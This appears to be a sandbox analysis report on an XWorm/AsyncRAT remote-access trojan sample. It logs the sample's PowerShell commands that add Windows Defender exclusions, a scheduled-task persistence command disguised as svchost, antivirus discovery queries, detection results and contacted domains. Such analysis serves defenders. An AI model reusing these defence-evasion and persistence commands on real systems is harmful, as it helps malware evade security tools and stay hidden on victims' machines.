Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Queries volume information: C:\Users\user\Desktop\a9YMw44iQq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\ProgramData\svchost.exe	Queries volume information: C:\ProgramData\svchost.exe VolumeInformation
Source: C:\ProgramData\svchost.exe	Queries volume information: C:\ProgramData\svchost.exe VolumeInformation
Source: C:\ProgramData\svchost.exe	Queries volume information: C:\ProgramData\svchost.exe VolumeInformation
Source: C:\ProgramData\svchost.exe	Queries volume information: C:\ProgramData\svchost.exe VolumeInformation
Source: C:\ProgramData\svchost.exe	Queries volume information: C:\ProgramData\svchost.exe VolumeInformation

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR

Source: a9YMw44iQq.exe, 00000000.00000002.3410060058.000000001BD93000.00000004.00000020.00020000.00000000.sdmp, a9YMw44iQq.exe, 00000000.00000002.3360693057.0000000000672000.00000004.00000020.00020000.00000000.sdmp, a9YMw44iQq.exe, 00000000.00000002.3404316306.000000001B1F3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: a9YMw44iQq.exe, type: SAMPLE
Source: Yara match	File source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: a9YMw44iQq.exe, type: SAMPLE
Source: Yara match	File source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Scheduled Task/Job	2 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	2 Scheduled Task/Job	111 Obfuscated Files or Information	Security Account Manager	541 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
a9YMw44iQq.exe	76%	ReversingLabs	Win32.Exploit.Xworm
a9YMw44iQq.exe	100%	Avira	TR/Spy.Gen
a9YMw44iQq.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\svchost.exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\svchost.exe	100%	Joe Sandbox ML
C:\ProgramData\svchost.exe	76%	ReversingLabs	Win32.Exploit.Xworm

Source	Detection	Scanner	Label
http://www.microsoft.coJ	0%	Avira URL Cloud	safe
http://www.microsoft.coK	0%	Avira URL Cloud	safe
http://www.micom/pkiops/Docs/ry.htm0	0%	Avira URL Cloud	safe
http://crl.microsx	0%	Avira URL Cloud	safe
http://crl.miB	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high
pastebin.com	172.67.19.24	true	false		high

Contacted URLs

